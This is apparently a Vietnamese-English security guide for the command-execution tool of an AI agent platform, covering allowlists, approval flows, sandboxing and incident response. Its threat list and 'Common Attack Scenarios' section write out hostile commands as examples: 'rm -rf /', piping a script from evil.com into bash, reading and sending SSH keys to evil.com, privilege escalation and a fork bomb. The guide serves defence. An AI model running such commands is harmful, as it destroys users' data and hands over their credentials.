Exec Security - Command Execution Safety
exec tool là mạnh nhất và nguy hiểm nhất trong OpenClaw. Trang này giải thích cách dùng an toàn.
exec có thể:
- Delete files:
rm -rf / - Install malware:
curl evil.com/script.sh | bash - Steal credentials:
cat ~/.ssh/id_rsa - Crypto mining: Background processes
- Data exfiltration: Upload files ra external servers
KHÔNG BAO GIỜ dùng security: "full" với agents không tin tưởng hoặc trong production!
Security Model Overview
3 Layers of Protection
┌─────────────────────────────────┐
│ 1. Security Policy │
│ (deny | allowlist | full) │
└─────────────────────────────────┘
↓
┌─────────────────────────────────┐
│ 2. Approval Flow │
│ (off | on-miss | always) │
└─────────────────────────────────┘
↓
┌─────────────────────────────────┐
│ 3. Sandbox Isolation │
│ (optional workspace) │
└─────────────────────────────────┘
Layer 1: Security Policy
deny (Safest)
Block tất cả exec calls
{
"tools": {
"exec": {
"security": "deny"
}
}
}
Use case:
- Agents chỉ cần read-only access
- Production bots không cần command execution
- Public-facing bots
Result: All exec → Error immediately
allowlist (Recommended)
Chỉ cho phép commands trong whitelist
{
"tools": {
"exec": {
"security": "allowlist",
"allowlist": [
"npm install",
"npm test",
"git status",
"git pull",
"ls -la",
"cat logs/*.log"
]
}
}
}
Matching:
- Exact match:
"git status"→ Onlygit status - Prefix match:
"npm *"→npm install,npm test, etc. - Regex:
"/^git (status|pull)$/"→git statusorgit pull
Per-agent allowlist:
{
"agents": {
"list": [
{
"id": "deploy-bot",
"tools": {
"exec": {
"allowlist": [
"npm run build",
"pm2 restart app"
]
}
}
},
{
"id": "backup-bot",
"tools": {
"exec": {
"allowlist": [
"tar -czf /backup/*.tar.gz /data"
]
}
}
}
]
}
}
full (⚠️ Dangerous)
Cho phép TẤT CẢ commands
{
"tools": {
"exec": {
"security": "full"
}
}
}
- Development environment riêng
- Isolated VM/container
- Trusted personal use only
- NEVER trong production
- NEVER với public bots
Layer 2: Approval Flow
ask: "off" (Auto-run)
Never ask - chạy luôn nếu trong allowlist
{
"tools": {
"exec": {
"ask": "off",
"security": "allowlist"
}
}
}
Safe khi:
- Allowlist rất cụ thể
- Commands không destructive
- Trusted environment
ask: "on-miss" (Recommended)
Ask nếu không có trong allowlist
{
"tools": {
"exec": {
"ask": "on-miss",
"security": "allowlist",
"allowlist": ["git status", "ls"]
}
}
}
Flow:
- Agent muốn chạy
git status→ ✅ Auto-run (trong allowlist) - Agent muốn chạy
rm file.txt→ ⚠️ Ask user approval
Best practice: Gradually build allowlist
- Start với
ask: "always" - Approve safe commands nhiều lần
- Add vào allowlist
- Switch to
ask: "on-miss"
ask: "always" (Safest)
Always ask trước mỗi exec
{
"tools": {
"exec": {
"ask": "always"
}
}
}
Use case:
- Learning phase
- Untrusted agents
- High-security environments
Tradeoff: Lots of interruptions
Layer 3: Sandbox Isolation
Workspace Restriction
Giới hạn file access trong workspace
{
"agents": {
"defaults": {
"workspace": "/home/user/openclaw-sandbox",
"sandbox": {
"enabled": true,
"enforceWorkspace": true
}
}
}
}
Behavior:
read_file,write_file: Only trong workspaceexec: CWD = workspace..paths blocked
Example:
# Agent in /home/user/openclaw-sandbox
exec("cat /etc/passwd") # ❌ Blocked
exec("cat ./data.txt") # ✅ OK (within workspace)
Container Isolation (Advanced)
Docker container cho agents:
# docker-compose.yml
services:
openclaw-agent:
image: openclaw:latest
volumes:
- ./sandbox:/workspace:rw
- /etc/passwd:/etc/passwd:ro # Read-only system files
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
cap_add:
- NET_BIND_SERVICE
networks:
- isolated
Benefits:
- Full process isolation
- Resource limits (CPU/RAM)
- Network isolation
- File system restrictions
Approval UI
Chat Channel Approvals
Forward approval requests tới chat:
{
"tools": {
"exec": {
"approvals": {
"forwardTo": "telegram",
"timeout": 300 // 5 minutes
}
}
}
}
Flow:
Agent request exec
Bot sends message tới Telegram:
🔔 Exec Approval Request
Command: rm temp/*.log
Agent: cleanup-bot
Risk: Medium
Reply:
/approve abc123
/deny abc123User reply
/approve abc123Command executes
Dashboard Approvals
GUI workflow:
Open
http://localhost:18789/approvalsSee pending requests:
Command: npm install axios
Agent: dev-helper
Time: 2026-01-30 10:40:15
[Approve] [Deny] [Add to Allowlist]Click action
Best Practices
1. Start Restrictive, Gradually Open
Week 1:
{
"tools": {
"exec": {
"security": "allowlist",
"ask": "always",
"allowlist": []
}
}
}
Week 2-4: Add frequently-used safe commands
{
"allowlist": [
"git status",
"npm test",
"ls -la"
],
"ask": "on-miss"
}
Month 2: Switch to on-miss
{
"ask": "on-miss"
}
2. Separate Agents by Permission
{
"agents": {
"list": [
{
"id": "readonly",
"tools": {
"exec": {
"security": "deny"
}
}
},
{
"id": "developer",
"tools": {
"exec": {
"security": "allowlist",
"allowlist": ["npm *", "git *"]
}
}
},
{
"id": "admin",
"tools": {
"exec": {
"security": "full",
"ask": "always"
}
},
"sandbox": {
"enabled": false
}
}
]
}
}
Route users accordingly:
{
"agents": {
"bindings": {
"whatsapp:+84123456789": "readonly",
"telegram:@devuser": "developer",
"telegram:@admin": "admin"
}
}
}
3. Audit Regularly
# View exec history
openclaw logs --filter exec --limit 100
# Security audit
openclaw security audit --deep
# Export for review
openclaw logs --filter exec --format json > exec_audit.json
Look for:
- Unusual commands
- Failed approvals
- Denied attempts
- Suspicious patterns
4. Allowlist Patterns
Good patterns:
{
"allowlist": [
"npm install", // Exact match
"git status",
"ls -la /workspace/*", // Scoped path
"/^pm2 (list|status)$/" // Regex specific
]
}
Bad patterns:
{
"allowlist": [
"rm *", // ❌ Too broad
"curl *", // ❌ Can download malware
"sudo *", // ❌ Privilege escalation
"/^.*$/" // ❌ Matches everything
]
}
5. Defense in Depth
Multiple layers:
{
"agents": {
"defaults": {
"sandbox": {
"enabled": true,
"workspace": "/sandbox"
},
"tools": {
"exec": {
"security": "allowlist",
"ask": "on-miss",
"timeout": 300, // Auto-kill after 5 min
"allowlist": ["git status", "npm test"]
}
}
}
}
}
Plus:
- Run in Docker
- Network firewall
- File system quotas
- Process limits
Common Attack Scenarios
1. Command Injection
Attack:
Agent: "List files in /tmp"
User: "Show me /tmp files"
Agent exec: ls -la /tmp; rm -rf /
Defense:
- Allowlist blocks
rm - Approval required
- Sandbox prevents access to
/
2. Credential Theft
Attack:
exec("cat ~/.ssh/id_rsa > /tmp/key.txt")
exec("curl evil.com?data=$(cat /tmp/key.txt)")
Defense:
- Sandbox blocks access to
~/.ssh curlnot in allowlist- Approval flow catches suspicious commands
3. Privilege Escalation
Attack:
exec("sudo su -")
exec("chmod +s /bin/bash")
Defense:
sudoblocked by allowlist- Sandbox has no sudo access
- Container has
no-new-privileges
4. Resource Exhaustion
Attack:
exec(":(){ :|:& };:") // Fork bomb
exec("dd if=/dev/zero of=/tmp/fill") // Disk fill
Defense:
- Timeout kills long processes
- Container resource limits
- Disk quotas
Incident Response
If Compromised
Immediately kill gateway:
pkill -9 openclawCheck for damage:
# Check modified files
find / -type f -mtime -1
# Check network connections
netstat -tuln
# Check processes
ps aux | grep -v "\["Rotate credentials:
- API keys
- Bot tokens
- SSH keys
- Passwords
Review logs:
cat ~/.openclaw/logs/*.log | grep execReport:
- OpenClaw security team
- Hosting provider (if VPS)
Tools Comparison
| Security Level | Config | Best For |
|---|---|---|
| Paranoid | deny + sandbox | Public bots |
| Safe | allowlist + ask: on-miss | Personal usage |
| Convenient | allowlist + ask: off | Trusted automation |
| Full Access | full + ask: always | Dev only |
| ⚠️ Dangerous | full + ask: off | NEVER USE |
Next Steps
Questions? Discord #security | Report issues: security@openclaw.vn